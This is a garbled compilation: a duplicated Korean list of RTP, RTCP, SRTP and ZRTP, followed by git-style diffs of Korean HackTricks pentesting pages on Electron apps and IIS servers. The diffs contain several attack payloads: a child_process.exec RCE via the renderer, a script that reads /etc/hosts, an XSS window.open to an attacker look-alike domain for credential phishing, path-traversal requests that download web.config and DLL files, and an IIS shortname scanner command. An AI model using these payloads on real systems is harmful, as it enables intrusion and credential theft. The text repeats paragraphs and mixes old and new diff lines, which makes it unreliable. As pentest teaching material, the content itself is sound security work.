2. **RTCP (실시간 전송 제어 프로토콜)**: RTCP는 RTP의 수반 프로토콜로, 미디어 스트림의 품질 모니터링 및 미디어 전송에 대한 피드백을 제공하기 위해 사용됩니다. RTP와 동일한 **RFC 3550**에서 정의된 RTCP는 **주기적으로 RTP 세션 참가자 간에 제어 패킷을 교환**합니다. 이를 통해 패킷 손실, 지연, 왕복 시간과 같은 정보를 공유하여 네트워크 상황을 진단하고 적응하여 전반적인 미디어 품질을 향상시킵니다.
3. **SRTP (안전한 실시간 전송 프로토콜)**: SRTP는 미디어 스트림을 위한 **암호화**, **메시지 인증**, **재생 방지**를 제공하는 RTP의 확장입니다. **RFC 3711**에서 정의된 SRTP는 암호화를 위해 AES와 같은 암호 알고리즘, 메시지 인증을 위해 HMAC-SHA1을 사용합니다. SRTP는 종종 SIP over TLS와 같은 안전한 시그널링 프로토콜과 함께 사용되어 멀티미디어 통신에서 종단 간 보안을 제공합니다.
4. **ZRTP (짐머만 실시간 전송 프로토콜)**: ZRTP는 RTP 미디어 스트림을 위한 **종단 간 암호화**를 제공하는 암호 키 합의 프로토콜입니다. PGP의 창시자 인 Phil Zimmermann에 의해 개발된 ZRTP는 **RFC 6189**에서 설명됩니다. 키 교환을 위해 시그널링 프로토콜에 의존하는 SRTP와 달리, ZRTP는 시그널링 프로토콜과 독립적으로 작동하도록 설계되었습니다. 통신하는 당사자 간에 공유 비밀을 설정하기 위해 **Diffie-Hellman 키 교환**을 사용하며, 사전 신뢰나 공개 키 인프라 (PKI)가 필요하지 않습니다. ZRTP에는 **중간자 공격에 대비하는 Short Authentication Strings (SAS)**와 같은 기능도 포함되어 있습니다.
1. **RTP (실시간 전송 프로토콜)**: RTP는 오디오 및 비디오 데이터 또는 기타 실시간 미디어를 IP 네트워크 상에서 전달하기 위해 설계된 네트워크 프로토콜입니다. **IETF**에 의해 개발되었으며 **RFC 3550**에서 정의되었습니다. RTP는 **동기화**, **순서화** 및 **타임스탬핑**을 위한 메커니즘을 제공하여 미디어 스트림의 부드럽고 시기적인 재생을 보장하는 데 사용됩니다.
2. **RTCP (실시간 전송 제어 프로토콜)**: RTCP는 RTP의 수반 프로토콜로, 미디어 스트림의 품질을 모니터링하고 미디어 스트림의 전송에 대한 피드백을 제공하는 데 사용됩니다. RTP와 동일한 **RFC 3550**에서 정의되며, RTCP는 **RTP 세션 참가자 간에 주기적으로 제어 패킷을 교환**합니다. 이를 통해 패킷 손실, 지터 및 왕복 시간과 같은 정보를 공유하여 네트워크 조건을 진단하고 적응하여 전반적인 미디어 품질을 향상시킵니다.
3. **SRTP (안전한 실시간 전송 프로토콜)**: SRTP는 미디어 스트림을 위한 **암호화**, **메시지 인증** 및 **재생 보호**를 제공하는 RTP의 확장입니다. **RFC 3711**에서 정의되며, SRTP는 암호화를 위해 AES와 메시지 인증을 위해 HMAC-SHA1과 같은 암호 알고리즘을 사용합니다. SRTP는 종종 SIP over TLS와 같은 안전한 시그널링 프로토콜과 함께 사용되어 멀티미디어 통신에서 종단 간 보안을 제공합니다.
4. **ZRTP (짐머만 실시간 전송 프로토콜)**: ZRTP는 RTP 미디어 스트림에 대한 **종단 간 암호화**를 제공하는 암호 키 합의 프로토콜입니다. PGP의 창시자 인 필 짐머만에 의해 개발되었으며 **RFC 6189**에서 설명되었습니다. SRTP가 키 교환을 위해 시그널링 프로토콜에 의존하는 반면, ZRTP는 시그널링 프로토콜과 독립적으로 작동하도록 설계되었습니다. 통신하는 당사자 간에 공유 비밀을 설정하기 위해 **Diffie-Hellman 키 교환**을 사용하며, 사전 신뢰나 공개 키 인프라 (PKI)가 필요하지 않습니다. ZRTP에는 **중간자 공격에 대한 보호를 제공하는** **Short Authentication Strings (SAS)**와 같은 기능도 포함되어 있습니다.
이러한 프로토콜은 IP 네트워크 상에서 **실시간 멀티미디어 통신을 전달하고 보호하는 데 중요한 역할**을 합니다. RTP 및 RTCP는 실제 미디어 전송 및 품질 모니터링을 처리하고, SRTP 및 ZRTP는 전송된 미디어가 도청, 변경 및 재생 공격으로부터 보호되도록 보장합니다.
이러한 프로토콜은 IP 네트워크 상에서 **실시간 멀티미디어 통신을 전달하고 보호하는 데 중요한 역할**을 합니다. RTP와 RTCP는 실제 미디어 전송 및 품질 모니터링을 처리하고, SRTP와 ZRTP는 전송된 미디어가 도청, 변경 및 재생 공격으로부터 보호되도록 보장합니다.

View file

@ -2,7 +2,7 @@
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)를 통해 제로부터 영웅이 될 때까지 AWS 해킹을 배우세요</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>!</strong></a><strong>!</strong></summary>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)를 통해 AWS 해킹을 처음부터 전문가까지 배우세요</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>!</strong></a><strong>!</strong></summary>
HackTricks를 지원하는 다른 방법:
@ -10,15 +10,15 @@ HackTricks를 지원하는 다른 방법:
* [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 구매하세요
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 당사의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* **💬 [Discord 그룹](https://discord.gg/hRep4RUj7f)** 또는 [**텔레그램 그룹**](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)를 **팔로우**하세요.
* **해킹 트릭을 공유하려면 PR을** [**HackTricks**](https://github.com/carlospolop/hacktricks) **** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **깃허브 저장소에 제출하세요.**
* **해킹 트릭을 공유하려면** [**HackTricks**](https://github.com/carlospolop/hacktricks) 및 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 저장소에 PR을 제출하세요.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 활용한 검색 엔진으로, **스틸러 악성 소프트웨어**에 의해 회사나 고객이 **침해**당했는지 무료로 확인할 수 있는 기능을 제공합니다.
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 활용한 검색 엔진으로, 회사나 고객이 **스틸러 악성 소프트웨어**에 의해 **침해**당했는지 무료로 확인할 수 있는 기능을 제공합니다.
WhiteIntel의 주요 목표는 정보를 도난하는 악성 소프트웨어로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.
@ -30,14 +30,14 @@ WhiteIntel의 주요 목표는 정보를 도난하는 악성 소프트웨어로
## 소개
Electron은 로컬 백엔드(**NodeJS** 포함)와 프론트엔드(**Chromium**)를 결합지만, 현대 브라우저의 보안 메커니즘 중 일부가 부족합니다.
Electron은 로컬 백엔드(**NodeJS** 포함)와 프론트엔드(**Chromium**)를 결합한 것이지만, 현대 브라우저의 보안 메커니즘 중 일부가 부족합니다.
일반적으로 `.asar` 애플리케이션 내에 electron 앱 코드를 찾을 수 있으며, 코드를 얻으려면 추출해야 합니다:
```bash
npx asar extract app.asar destfolder #Extract everything
npx asar extract-file app.asar main.js #Extract just a file
```
Electron 앱의 소스 코드에서 `packet.json`에 보안 구성이 설정된 `main.js` 파일이 지정되어 있습니다.
Electron 앱의 소스 코드에서 `packet.json` 파일 내에 보안 구성이 설정된 `main.js` 파일을 찾을 수 있습니다.
```json
{
"name": "standard-notes",
@ -58,16 +58,16 @@ let win = new BrowserWindow();
//Open Renderer Process
win.loadURL(`file://path/to/index.html`);
```
**렌더러 프로세스**의 설정은 main.js 파일 내부의 **메인 프로세스**에서 **구성**할 수 있습니다. 일부 구성은 Electron 애플리케이션이 RCE를 방지하거나 다른 취약점을 방지할 수 있습니다.
**렌더러 프로세스**의 설정은 main.js 파일 내부의 **메인 프로세스**에서 **구성**할 수 있습니다. 일부 구성은 **Electron 애플리케이션이 RCE를 방지**하거나 다른 취약점을 방지할 수 있습니다 **설정이 올바르게 구성**된 경우.
Electron 애플리케이션은 Node API를 통해 기기에 액세스할 수 있지만 다음과 같이 구성하여 방지할 수 있습니다:
Electron 애플리케이션은 Node API를 통해 기기에 액세스할 수 있지만 다음을 방지하도록 구성할 수 있습니다:
* **`nodeIntegration`** - 기본적으로 `off`입니다. 활성화하면 렌더러 프로세스에서 Node 기능에 액세스할 수 있습니다.
* **`contextIsolation`** - 기본적으로 `on`입니다. 비활성화하면 메인 및 렌더러 프로세스가 격리되지 않습니다.
* **`nodeIntegration`** - 기본적으로 `off`입니다. 켜면 렌더러 프로세스에서 노드 기능에 액세스할 수 있습니다.
* **`contextIsolation`** - 기본적으로 `on`입니다. 면 메인 및 렌더러 프로세스가 격리되지 않습니다.
* **`preload`** - 기본적으로 비어 있습니다.
* [**`sandbox`**](https://docs.w3cub.com/electron/api/sandbox-option) - 기본적으로 비활성화되어 있습니다. 이는 NodeJS가 수행할 수 있는 작업을 제한합니다.
* [**`sandbox`**](https://docs.w3cub.com/electron/api/sandbox-option) - 기본적으로 꺼져 있습니다. 이는 NodeJS가 수행할 수 있는 작업을 제한합니다.
* Workers에서의 Node 통합
* **`nodeIntegrationInSubframes`** - 기본적으로 `off`입니다.
* **`nodeIntegrationInSubframes`**- 기본적으로 `off`입니다.
* **`nodeIntegration`**이 **활성화**되어 있으면 Electron 애플리케이션 내에서 iframe에 로드된 웹 페이지에서 **Node.js API**를 사용할 수 있습니다.
* **`nodeIntegration`**이 **비활성화**되어 있으면 preload가 iframe에서 로드됩니다.
@ -137,7 +137,7 @@ top.require('child_process').exec('open /System/Applications/Calculator.app');
## RCE: preload
이 설정에 표시된 스크립트는 **렌더러에서 다른 스크립트보다 먼저 로드**되므로 **Node API에 무제한 액세스**가 가능합니다:
이 설정에 표시된 스크립트는 렌더러에서 다른 스크립트보다 **먼저 로드되므로 Node API에 무제한 액세스**가 가능합니다:
```javascript
new BrowserWindow{
webPreferences: {
@ -199,22 +199,22 @@ _**contextIsolation**_은 **웹 페이지 스크립트와 JavaScript Electron의
### 클릭 이벤트 우회
링크를 클릭할 때 제한이 적용된 경우 일반 왼쪽 클릭 대신 **가운데 클릭**을 하여 우회할 수 있습니다.
링크를 클릭할 때 제한이 적용된 경우 일반 왼쪽 클릭 대신 **가운데 클릭**을 하면 우회할 수 있을 수도 있습니다.
```javascript
window.addEventListener('click', (e) => {
```
## shell.openExternal을 통한 RCE
이 예제에 대한 자세한 내용은 [https://shabarkin.medium.com/1-click-rce-in-electron-applications-79b52e1fe8b8](https://shabarkin.medium.com/1-click-rce-in-electron-applications-79b52e1fe8b8) 및 [https://benjamin-altpeter.de/shell-openexternal-dangers/](https://benjamin-altpeter.de/shell-openexternal-dangers/)를 확인하십시오.
이 예제에 대한 자세한 내용은 [https://shabarkin.medium.com/1-click-rce-in-electron-applications-79b52e1fe8b8](https://shabarkin.medium.com/1-click-rce-in-electron-applications-79b52e1fe8b8) 및 [https://benjamin-altpeter.de/shell-openexternal-dangers/](https://benjamin-altpeter.de/shell-openexternal-dangers/)에서 확인할 수 있습니다.
Electron 데스크톱 애플리케이션을 배포할 때 `nodeIntegration``contextIsolation`에 대한 올바른 설정을 보장하는 것이 중요합니다. 이러한 설정이 적용되면 preload 스크립트나 Electron의 네이티브 코드를 대상으로 하는 **클라이언트 측 원격 코드 실행 (RCE)**이 효과적으로 방지됩니다.
Electron 데스크톱 애플리케이션을 배포할 때 `nodeIntegration``contextIsolation`에 대한 올바른 설정을 보장하는 것이 중요합니다. 이러한 설정이 적용되면 preload 스크립트나 Electron의 메인 프로세스에서의 **클라이언트 측 원격 코드 실행 (RCE)**이 효과적으로 방지됩니다.
사용자가 링크를 상호 작용하거나 새 창을 열 때 특정 이벤트 리스너가 트리거되며, 이는 애플리케이션의 보안 및 기능에 중요합니다:
```javascript
webContents.on("new-window", function (event, url, disposition, options) {}
webContents.on("will-navigate", function (event, url) {}
```
이러한 리스너는 데스크톱 애플리케이션에 의해 **덮어쓰여져** 자체 **비즈니스 로직**을 구현합니다. 애플리케이션은 탐색된 링크가 내부적으로 열지 여부를 평가합니다. 이 결정은 일반적으로 `openInternally` 함수를 통해 이루어집니다. 이 함수가 `false`를 반환하면, 해당 링크는 `shell.openExternal` 함수를 활용하여 외부에서 열어야 함을 나타냅니다.
이러한 리스너는 데스크톱 애플리케이션에 의해 **덮어쓰여져** 자체 **비즈니스 로직**을 구현합니다. 애플리케이션은 탐색된 링크를 내부적으로 열지, 외부 웹 브라우저에서 열지를 판단합니다. 이 결정은 일반적으로 `openInternally` 함수를 통해 이루어집니다. 이 함수가 `false`를 반환하면, 해당 링크는 `shell.openExternal` 함수를 활용하여 외부에서 열리도록 지시합니다.
**다음은 간단한 의사 코드입니다:**
@ -222,7 +222,7 @@ webContents.on("will-navigate", function (event, url) {}
![https://miro.medium.com/max/1400/1\*ZfgVwT3X1V\_UfjcKaAccag.png](<../../../.gitbook/assets/image (960).png>)
Electron JS 보안 모범 사례`openExternal` 함수를 통해 신뢰할 수 없는 콘텐츠를 수용하지 않는 것을 권장합니다. 이는 다양한 프로토콜을 통해 RCE로 이어질 수 있기 때문입니다. 운영 체제는 RCE를 유발할 수 있는 다양한 프로토콜을 지원합니다. 이 주제에 대한 자세한 예제 및 설명은 [이 리소스](https://positive.security/blog/url-open-rce#windows-10-19042)를 참조할 수 있으며, 이는 이 취약점을 악용할 수 있는 Windows 프로토콜 예제를 포함하고 있습니다.
Electron JS 보안 모베스트 프랙티스`openExternal` 함수를 통해 신뢰할 수 없는 콘텐츠를 수용하지 않는 것을 권장하며, 이는 다양한 프로토콜을 통해 RCE로 이어질 수 있습니다. 운영 체제는 RCE를 유발할 수 있는 다양한 프로토콜을 지원합니다. 이 주제에 대한 자세한 예제 및 설명은 [이 리소스](https://positive.security/blog/url-open-rce#windows-10-19042)를 참조할 수 있으며, 이는 이 취약점을 악용할 수 있는 Windows 프로토콜 예제를 포함하고 있습니다.
**Windows 프로토콜 악용 예시:**
```html
@ -258,7 +258,7 @@ function j(){alert('pwned contents of /etc/hosts :\n\n '+frames[0].document.body
만약 애플리케이션에서 사용하는 **크로미움**이 **오래되었고** 그 위에 **알려진 취약점**이 있다면, **XSS를 통해 RCE를 얻을 수도 있습니다**.\
이 **writeup**에서 예제를 확인할 수 있습니다: [https://blog.electrovolt.io/posts/discord-rce/](https://blog.electrovolt.io/posts/discord-rce/)
## **XSS Phishing via Internal URL regex bypass**
## **내부 URL 정규식 우회를 통한 XSS 피싱**
만약 XSS를 발견했지만 **RCE를 유발하거나 내부 파일을 탈취할 수 없다면**, 이를 사용하여 **피싱을 통해 자격 증명을 탈취**해 볼 수 있습니다.
@ -267,9 +267,9 @@ function j(){alert('pwned contents of /etc/hosts :\n\n '+frames[0].document.body
webContents.on("new-window", function (event, url, disposition, options) {} // opens the custom openInternally function (it is declared below)
webContents.on("will-navigate", function (event, url) {} // opens the custom openInternally function (it is declared below)
```
**`openInternally`** 함수 호출은 링크가 플랫폼에 속하는 링크인 경우 **데스크톱 창**에서 열지, **또는** 3rd party 리소스로 **브라우저에서 열지** 여부를 결정합니다.
**`openInternally`** 호출은 링크가 플랫폼에 속하는 링크인 경우 **데스크톱 창**에서 열지, **또는** 브라우저에서 **3rd party 자원으로 열지**를 결정합니다.
함수에서 사용된 **정규 표현식**이 **우회 가능**한 경우(예: **서브도메인의 점을 이스케이프하지 않음**), 공격자는 XSS를 악용하여 **사용자에게 자격 증명을 요청하는** 공격자의 인프라에 위치한 **새 창을 열 수 있습니다:**
함수에서 사용된 **정규 표현식**이 **우회 가능**한 경우(예: **서브도메인의 점을 이스케이프하지 않음**), 공격자는 XSS를 악용하여 사용자에게 **자격 증명을 요청하는** 공격자의 인프라에 위치한 **새 창을 열 수 있습니다**:
```html
<script>
window.open("<http://subdomainagoogleq.com/index.html>")
@ -286,7 +286,7 @@ window.open("<http://subdomainagoogleq.com/index.html>")
[https://www.youtube.com/watch?v=xILfQGkLXQo\&t=22s](https://www.youtube.com/watch?v=xILfQGkLXQo\&t=22s)에서 취약한 Electron 앱을 악용하는 랩을 찾을 수 있습니다.
랩을 수행하는 데 도움이 되는 몇 가지 명령어:
랩을 도울 몇 가지 명령어:
```bash
# Download apps from these URls
# Vuln to nodeIntegration
@ -316,14 +316,14 @@ npm start
* [https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=8](https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=8)
* [https://www.youtube.com/watch?v=a-YnG3Mx-Tg](https://www.youtube.com/watch?v=a-YnG3Mx-Tg)
* [https://www.youtube.com/watch?v=xILfQGkLXQo\&t=22s](https://www.youtube.com/watch?v=xILfQGkLXQo\&t=22s)
* Electron 보안에 대한 더 많은 연구 및 기고는 [https://github.com/doyensec/awesome-electronjs-hacking](https://github.com/doyensec/awesome-electronjs-hacking)에서 확인할 수 있습니다.
* Electron 보안에 대한 추가 연구 및 기고는 [https://github.com/doyensec/awesome-electronjs-hacking](https://github.com/doyensec/awesome-electronjs-hacking)에서 확인할 수 있습니다.
* [https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81](https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81)
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 활용한 검색 엔진으로, 회사나 그 고객이 **스틸러 악성 소프트웨어**에 의해 **침해**당했는지 확인하는 **무료** 기능을 제공합니다.
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 활용한 검색 엔진으로, 회사나 고객이 **stealer malwares**에 의해 **침해**당했는지 무료 기능을 제공합니다.
WhiteIntel의 주요 목표는 정보를 도난하는 악성 소프트웨어로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.
@ -333,12 +333,12 @@ WhiteIntel의 주요 목표는 정보를 도난하는 악성 소프트웨어로
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong>를 통해 **제로**부터 **AWS 해킹**을 마스터하세요!</summary>
<summary><strong>제로부터 AWS 해킹을 전문가로 배우세요</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>와 함께!</strong></summary>
HackTricks를 지원하는 다른 방법:
* **회사를 HackTricks에 광고하거나 PDF 형식으로 다운로드하려면** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 구하세요
* **HackTricks에 귀사를 광고하거나 HackTricks를 PDF로 다운로드**하려면 [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 구하세요
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 당사의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* **💬 [디스코드 그룹](https://discord.gg/hRep4RUj7f)** 또는 [텔레그램 그룹](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**를 팔로우**하세요.
* **HackTricks 및 HackTricks Cloud** 깃허브 저장소에 PR을 제출하여 **해킹 트릭을 공유**하세요.

View file

@ -6,23 +6,23 @@
HackTricks를 지원하는 다른 방법:
* **회사가 HackTricks에 광고되길 원하거나 PDF로 HackTricks를 다운로드**하고 싶다면 [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* **회사가 HackTricks에 광고되길 원하거나 PDF로 HackTricks를 다운로드하고 싶다면** [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 구매하세요
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 당사의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* **💬 [Discord 그룹](https://discord.gg/hRep4RUj7f)** 또는 [텔레그램 그룹](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)를 **팔로우**하세요.
* **💬 [Discord 그룹](https://discord.gg/hRep4RUj7f)** 또는 [텔레그램 그룹](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**를 팔로우**하세요.
* **HackTricks****HackTricks Cloud** github 저장소에 PR을 제출하여 **해킹 트릭을 공유**하세요.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 활용한 검색 엔진으로, **무료** 기능을 제공하여 회사나 고객이 **스틸러 악성 코드**에 의해 **침해**당했는지 확인할 수 있습니다.
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 활용한 검색 엔진으로, 회사나 고객이 **스틸러 악성 코드**에 의해 **침해**당했는지 무료로 확인할 수 있는 기능을 제공합니다.
WhiteIntel의 주요 목표는 정보 도난 악성 코드로 인한 계정 탈취 및 랜섬웨어 공격을 방지하는 것입니다.
WhiteIntel의 주요 목표는 정보 도난 악성 코드로 인한 계정 탈취 및 랜섬웨어 공격을 는 것입니다.
그들의 웹사이트를 확인하고 **무료**로 엔진을 시험해 볼 수 있습니다:
그들의 웹사이트를 방문하여 엔진을 **무료로** 시험해 볼 수 있습니다:
{% embed url="https://whiteintel.io" %}
@ -55,7 +55,7 @@ X-FEServer: NHEXCHANGE2016
```
## .config 파일 실행
.config 파일을 업로드하고 해당 파일을 사용하여 코드를 실행할 수 있습니다. 이를 수행하는 한 가지 방법은 파일 끝에 HTML 주석 내에 코드를 추가하는 것입니다: [여기에서 예제 다운로드](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Configuration%20IIS%20web.config/web.config)
.config 파일을 업로드하고 코드를 실행하는 방법 중 하나는 파일 끝에 HTML 주석 안에 코드를 추가하는 것입니다: [여기에서 예제 다운로드](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Configuration%20IIS%20web.config/web.config)
이 취약점을 악용하는 더 많은 정보 및 기술은 [여기](https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/)에서 확인할 수 있습니다.
@ -65,7 +65,7 @@ X-FEServer: NHEXCHANGE2016
{% file src="../../.gitbook/assets/iisfinal.txt" %}
이 목록은 다음 몁단의 내용을 병합하여 만들어졌습니다:
이 목록은 다음 몁단의 내용을 병합하여 만들습니다:
[https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/IIS.fuzz.txt](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/IIS.fuzz.txt)\
[http://itdrafts.blogspot.com/2013/02/aspnetclient-folder-enumeration-and.html](http://itdrafts.blogspot.com/2013/02/aspnetclient-folder-enumeration-and.html)\
@ -80,11 +80,11 @@ X-FEServer: NHEXCHANGE2016
### 소스 코드 노출
전체 설명은 여기에서 확인하십시오: [https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html](https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html)
전체 설명은 여기에서 확인할 수 있습니다: [https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html](https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html)
{% hint style="info" %}
요약하면, 응용 프로그램 폴더 내에 "**assemblyIdentity**" 파일과 "**namespaces**"에 대한 참조가 포함된 여러 web.config 파일이 있습니다. 이 정보를 통해 **실행 파일이 어디에 있는지** 알 수 있고 다운로드할 수 있습니다.\
다운로드한 Dll에서는 **새로운 namespaces**를 찾을 수 있으며 액세스하고 web.config 파일을 가져와 새로운 namespaces와 assemblyIdentity를 찾아야 합니다.\
다운로드한 Dlls에서는 **새로운 namespaces**를 찾을 수 있으며 액세스하고 web.config 파일을 가져와 새로운 namespaces와 assemblyIdentity를 찾아야 합니다.\
또한, 파일 **connectionstrings.config** 및 **global.asax**에는 흥미로운 정보가 포함될 수 있습니다.\\
{% endhint %}
@ -120,14 +120,14 @@ Host: example-mvc-application.minded
```
### **DLL 다운로드**
사용자 지정 네임스페이스 언급은 /bin 디렉토리에 있는 "**WebApplication1**"이라는 DLL을 시사합니다. 이에 이어 **WebApplication1.dll**을 다운로드하는 요청이 표시됩니다:
사용자 지정 네임스페이스 언급은 /bin 디렉토리에 있는 "**WebApplication1**"이라는 DLL을 나타냅니다. 이에 이어 **WebApplication1.dll**을 다운로드하는 요청이 표시됩니다:
```markup
GET /download_page?id=..%2f..%2fbin/WebApplication1.dll HTTP/1.1
Host: example-mvc-application.minded
```
이는 **System.Web.Mvc.dll** 및 **System.Web.Optimization.dll**과 같은 다른 필수 DLL이 /bin 디렉토리에 존재할 가능성을 시사합니다.
DLL이 **WebApplication1.Areas.Minded**라는 네임스페이스를 가져오는 시나리오에서, 공격자는 **/area-name/Views/**와 같은 예측 가능한 경로에 다른 web.config 파일의 존재를 추론할 수 있으며, 해당 파일은 /bin 폴더에 있는 다른 DLL에 대한 특정 구성 및 참조를 포함할 수 있습니다. 예를 들어, **/Minded/Views/web.config**로의 요청은 다른 DLL인 **WebApplication1.AdditionalFeatures.dll**의 존재를 나타내는 구성 및 네임스페이스를 공개할 수 있습니다.
DLL이 **WebApplication1.Areas.Minded**라는 네임스페이스를 가져오는 시나리오에서, 공격자는 **/area-name/Views/**와 같은 예측 가능한 경로에 다른 web.config 파일의 존재를 추론할 수 있습니다. 이 파일들은 특정 구성 및 /bin 폴더의 다른 DLL에 대한 참조를 포함할 수 있습니다. 예를 들어, **/Minded/Views/web.config**로의 요청은 다른 DLL인 **WebApplication1.AdditionalFeatures.dll**의 존재를 나타내는 구성 및 네임스페이스를 노출할 수 있습니다.
### 공통 파일
@ -210,19 +210,19 @@ C:\xampp\tomcat\conf\server.xml
```
## HTTPAPI 2.0 404 에러
만약 다음과 같은 에러를 다면:
만약 다음과 같은 에러를 보게 된다면:
![](<../../.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (10) (2).png>)
것은 서버가 **올바른 도메인 이름을 Host 헤더 내에서 받지 못했음**을 의미합니다.\
웹 페이지에 접근하기 위해 제공된 **SSL 인증서**를 확인하여 도메인/서브도메인 이름을 찾을 수 있습니다. 그곳에 없다면 **올바른 것을 찾을 때까지 VHosts를 무차별 대입(brute force)** 해야 할 수도 있습니다.
는 서버가 **Host 헤더 내에서 올바른 도메인 이름을 받지 못했음**을 의미합니다.\
웹 페이지에 액세스하려면 제공된 **SSL 인증서**를 확인하여 도메인/서브도메인 이름을 찾을 수 있습니다. 그곳에 없다면 올바른 것을 찾을 때까지 **VHosts를 무차별 대입(brute force)** 해야 할 수도 있습니다.
## 찾아볼 가치가 있는 오래된 IIS 취약점
### Microsoft IIS 물결 문자 "\~" 취약점/기능 - 짧은 파일/폴더 이름 노출
**기법**을 사용하여 발견된 각 폴더 내의 폴더와 파일을 **열거해볼 수 있습니다**(기본 인증이 필요한 경우도).\
이 기법의 주요 제한 사항은 서버가 취약하다면 **각 파일/폴더 이름의 처음 6자 및 파일의 확장자의 처음 3자까지만 찾을 수 있다는 것**입니다.
**기법**을 사용하여 발견된 각 폴더 내의 폴더와 파일을 **열거해볼 수 있습니다**(기본 인증이 필요한 경우도 포함).\
이 기법의 주요 제한 사항은 서버가 취약하다면 **각 파일/폴더 이름의 처음 6자 및 파일의 확장자의 처음 3자까지만 찾을 수 있다**는 것입니다.
이 취약점을 테스트하기 위해 [https://github.com/irsdl/IIS-ShortName-Scanner](https://github.com/irsdl/IIS-ShortName-Scanner)를 사용할 수 있습니다:`java -jar iis_shortname_scanner.jar 2 20 http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/`
@ -259,12 +259,12 @@ ASPXAUTH는 다음 정보를 사용합니다:
* **`decryptionIV`** (문자열): 16진수로 인코딩된 초기화 벡터 (기본값은 0 벡터).
* **`decryptionKey`** (문자열): 복호화에 사용할 16진수로 인코딩된 키.
그러나 일부 사람들은 이러한 매개변수의 **기본값**을 사용하고 **사용자의 이메일을 쿠키로 사용**할 수 있습니다. 따라서, 공격 대상 서버에서 **사용자의 이메일을 사용자로 만드는** 웹을 찾을 수 있다면, 두 번째 서버에서 얻은 쿠키를 첫 번째 서버에서 사용하여 사용자를 흉내 낼 수 있을 수도 있습니다.\
그러나 일부 사람들은 이러한 매개변수의 **기본값**을 사용하고 **사용자의 이메일을 쿠키로 사용**할 수 있습니다. 따라서, 공격 대상 서버에서 사용자의 이메일을 가진 사용자를 **생성**하고, ASPXAUTH 쿠키를 사용하는 **동일한 플랫폼을 사용하는 웹을 찾으면**, 두 번째 서버에서 얻은 쿠키를 첫 번째 서버에서 사용하여 사용자를 흉내 낼 수 있을 수도 있습니다.\
